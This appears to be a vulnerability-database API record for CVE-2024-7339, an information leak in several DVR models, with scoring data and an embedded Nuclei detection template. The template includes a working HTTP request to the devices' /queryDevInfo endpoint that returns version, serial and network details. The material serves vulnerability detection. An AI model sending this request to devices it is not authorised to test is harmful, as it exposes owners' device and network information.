{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-7339/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-7339/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-7339/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-7339/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-7339/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-7339"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-7339"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.32028,
      "kev": false,
      "percentile": 0.98253
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-7339.yaml",
      "nuclei_template_severity": "medium",
      "nuclei_template_yaml": "id: CVE-2024-7339\n\ninfo:\n  name: TVT DVR Sensitive Device - Information Disclosure\n  author: Stuxctf\n  severity: medium\n  description: |\n    A vulnerability has been found in TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T and classified as problematic. This vulnerability affects unknown code of the file /queryDevInfo. The manipulation leads to information disclosure.\n  impact: |\n    An attacker get detailed device information including hardware and software versions, serial numbers, and network configuration.\n  remediation: |\n    Implement strict access controls and authentication mechanisms to manage access to the device interfaces.\n  reference:\n    - https://netsecfish.notion.site/Sensitive-Device-Information-Disclosure-in-TVT-DVR-fad1cce703d946969be5130bf3aaac0d\n    - https://netsecfish.notion.site/Sensitive-Device-Information-Disclosure-in-TVT-DVR-fad1cce703d946969be5130bf3aaac0d?pvs=4\n    - https://vuldb.com/?ctiid.273262\n    - https://vuldb.com/?id.273262\n    - https://vuldb.com/?submit.379373\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2024-7339\n    cwe-id: CWE-200\n    epss-score: 0.32028\n    epss-percentile: 0.98253\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2024,dvr,tvt,info-leak,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /queryDevInfo HTTP/1.1\n        Host: {{Hostname}}\n\n        <?xml version=\"1.0\" encoding=\"utf-8\" ?><request version=\"1.0\" systemType=\"NVMS-9000\" clientType=\"WEB\"/>\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"softwareVersion\"\n          - \"eth0\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100b3b9b9fd8853565174d0295c000f6d12a8e7180f505bc2457349205e244c9c0f022100f3a77d0c8bf75325d905ffb72935528da726c0727cd1145bb6dcef8b2b421e04:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-7339"
}